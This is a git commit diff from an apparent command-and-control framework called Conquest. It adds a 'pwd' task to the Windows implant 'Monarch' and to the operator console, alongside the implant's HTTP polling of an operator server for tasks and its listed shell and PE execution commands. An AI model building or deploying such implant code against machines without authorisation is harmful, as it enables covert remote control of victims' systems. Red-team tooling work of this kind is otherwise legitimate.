Implemented 'pwd' command to retrieve working directory.
This commit is contained in:
@@ -1,4 +1,4 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
CONQUEST_ROOT="/mnt/c/Users/jakob/Documents/Projects/conquest"
|
CONQUEST_ROOT="/mnt/c/Users/jakob/Documents/Projects/conquest"
|
||||||
nim --os:windows --cpu:amd64 --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc -d:release --outdir:"$CONQUEST_ROOT/bin" c $CONQUEST_ROOT/agents/monarch/client.nim
|
nim --os:windows --cpu:amd64 --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc -d:release --outdir:"$CONQUEST_ROOT/bin" -o:"monarch.x64.exe" c $CONQUEST_ROOT/agents/monarch/monarch.nim
|
||||||
|
|||||||
@@ -1,3 +1,3 @@
|
|||||||
import ./[shell, sleep]
|
import ./[shell, sleep, pwd]
|
||||||
|
|
||||||
export shell, sleep
|
export shell, sleep, pwd
|
||||||
32
agents/monarch/commands/pwd.nim
Normal file
32
agents/monarch/commands/pwd.nim
Normal file
@@ -0,0 +1,32 @@
|
|||||||
|
import os, strutils, strformat, base64, winim
|
||||||
|
|
||||||
|
import ../types
|
||||||
|
|
||||||
|
proc taskPwd*(task: Task): TaskResult =
|
||||||
|
|
||||||
|
echo fmt"Retrieving current working directory."
|
||||||
|
|
||||||
|
try:
|
||||||
|
|
||||||
|
# Get current working directory using GetCurrentDirectory
|
||||||
|
let
|
||||||
|
buffer = newWString(MAX_PATH + 1)
|
||||||
|
length = GetCurrentDirectoryW(MAX_PATH, &buffer)
|
||||||
|
|
||||||
|
if length == 0:
|
||||||
|
raise newException(OSError, "Failed to get working directory.")
|
||||||
|
|
||||||
|
return TaskResult(
|
||||||
|
task: task.id,
|
||||||
|
agent: task.agent,
|
||||||
|
data: encode($buffer[0 ..< (int)length] & "\n"),
|
||||||
|
status: Completed
|
||||||
|
)
|
||||||
|
|
||||||
|
except CatchableError as err:
|
||||||
|
return TaskResult(
|
||||||
|
task: task.id,
|
||||||
|
agent: task.agent,
|
||||||
|
data: encode(fmt"An error occured: {err.msg}" & "\n"),
|
||||||
|
status: Failed
|
||||||
|
)
|
||||||
@@ -35,15 +35,16 @@ proc register*(config: AgentConfig): string =
|
|||||||
proc getTasks*(config: AgentConfig, agent: string): seq[Task] =
|
proc getTasks*(config: AgentConfig, agent: string): seq[Task] =
|
||||||
|
|
||||||
let client = newAsyncHttpClient()
|
let client = newAsyncHttpClient()
|
||||||
|
var responseBody = ""
|
||||||
|
|
||||||
try:
|
try:
|
||||||
# Register agent to the Conquest server
|
# Register agent to the Conquest server
|
||||||
let responseBody = waitFor client.getContent(fmt"http://{config.ip}:{$config.port}/{config.listener}/{agent}/tasks")
|
responseBody = waitFor client.getContent(fmt"http://{config.ip}:{$config.port}/{config.listener}/{agent}/tasks")
|
||||||
return parseJson(responseBody).to(seq[Task])
|
return parseJson(responseBody).to(seq[Task])
|
||||||
|
|
||||||
except CatchableError as err:
|
except CatchableError as err:
|
||||||
# When the listener is not reachable, don't kill the application, but check in at the next time
|
# When the listener is not reachable, don't kill the application, but check in at the next time
|
||||||
echo "[-] [getTasks]:", err.msg
|
echo "[-] [getTasks]: ", responseBody
|
||||||
finally:
|
finally:
|
||||||
client.close()
|
client.close()
|
||||||
|
|
||||||
|
|||||||
@@ -23,6 +23,11 @@ proc handleTask*(task: Task, config: AgentConfig): TaskResult =
|
|||||||
# Return result
|
# Return result
|
||||||
return taskResult
|
return taskResult
|
||||||
|
|
||||||
|
of GetWorkingDirectory:
|
||||||
|
let taskResult = taskPwd(task)
|
||||||
|
echo taskResult.data
|
||||||
|
return taskResult
|
||||||
|
|
||||||
else:
|
else:
|
||||||
echo "Not implemented"
|
echo "Not implemented"
|
||||||
return nil
|
return nil
|
||||||
@@ -1,5 +1,5 @@
|
|||||||
import ./[shell, sleep]
|
import ./[shell, sleep, pwd]
|
||||||
export shell, sleep
|
export shell, sleep, pwd
|
||||||
|
|
||||||
#[
|
#[
|
||||||
"Monarch" Agent commands:
|
"Monarch" Agent commands:
|
||||||
|
|||||||
19
server/agent/commands/pwd.nim
Normal file
19
server/agent/commands/pwd.nim
Normal file
@@ -0,0 +1,19 @@
|
|||||||
|
import nanoid, sequtils, strutils, strformat, terminal, times
|
||||||
|
import ../../types
|
||||||
|
|
||||||
|
proc taskGetWorkingDirectory*(cq: Conquest) =
|
||||||
|
|
||||||
|
# Create a new task
|
||||||
|
let
|
||||||
|
date: string = now().format("dd-MM-yyyy HH:mm:ss")
|
||||||
|
task = Task(
|
||||||
|
id: generate(alphabet=join(toSeq('A'..'Z'), ""), size=8),
|
||||||
|
agent: cq.interactAgent.name,
|
||||||
|
command: GetWorkingDirectory,
|
||||||
|
args: @[],
|
||||||
|
)
|
||||||
|
|
||||||
|
# Add new task to the agent's task queue
|
||||||
|
cq.interactAgent.tasks.add(task)
|
||||||
|
|
||||||
|
cq.writeLine(fgBlack, styleBright, fmt"[{date}] [*] ", resetStyle, "Tasked agent to get current working directory.")
|
||||||
@@ -20,6 +20,9 @@ var parser = newParser:
|
|||||||
command("info"):
|
command("info"):
|
||||||
help("Display agent information and current settings.")
|
help("Display agent information and current settings.")
|
||||||
|
|
||||||
|
command("pwd"):
|
||||||
|
help("Retrieve current working directory")
|
||||||
|
|
||||||
command("help"):
|
command("help"):
|
||||||
nohelpflag()
|
nohelpflag()
|
||||||
|
|
||||||
@@ -58,6 +61,9 @@ proc handleAgentCommand*(cq: Conquest, args: varargs[string]) =
|
|||||||
of "info":
|
of "info":
|
||||||
discard
|
discard
|
||||||
|
|
||||||
|
of "pwd":
|
||||||
|
cq.taskGetWorkingDirectory()
|
||||||
|
|
||||||
# Handle help flag
|
# Handle help flag
|
||||||
except ShortCircuit as err:
|
except ShortCircuit as err:
|
||||||
if err.flag == "argparse_help":
|
if err.flag == "argparse_help":
|
||||||
|
|||||||
@@ -15,6 +15,7 @@ type
|
|||||||
ExecuteAssembly = "dotnet"
|
ExecuteAssembly = "dotnet"
|
||||||
ExecutePe = "pe"
|
ExecutePe = "pe"
|
||||||
Sleep = "sleep"
|
Sleep = "sleep"
|
||||||
|
GetWorkingDirectory = "pwd"
|
||||||
|
|
||||||
TaskStatus* = enum
|
TaskStatus* = enum
|
||||||
Completed = "completed"
|
Completed = "completed"
|
||||||
|
|||||||
@@ -139,7 +139,7 @@ proc timeSince*(agent: Agent, timestamp: DateTime): Cell =
|
|||||||
proc drawTable*(cq: Conquest, agents: seq[Agent]) =
|
proc drawTable*(cq: Conquest, agents: seq[Agent]) =
|
||||||
|
|
||||||
let headers: seq[string] = @["Name", "Address", "Username", "Hostname", "Operating System", "Process", "PID", "Activity"]
|
let headers: seq[string] = @["Name", "Address", "Username", "Hostname", "Operating System", "Process", "PID", "Activity"]
|
||||||
let widths = @[8, 15, 15, 15, 16, 15, 5, 8]
|
let widths = @[8, 15, 15, 15, 16, 13, 5, 8]
|
||||||
let headerCells = headers.mapIt(Cell(text: it, fg: fgWhite, bg: bgDefault))
|
let headerCells = headers.mapIt(Cell(text: it, fg: fgWhite, bg: bgDefault))
|
||||||
|
|
||||||
cq.writeLine(border(topLeft, topMid, topRight, widths))
|
cq.writeLine(border(topLeft, topMid, topRight, widths))
|
||||||
|
|||||||
Reference in New Issue
Block a user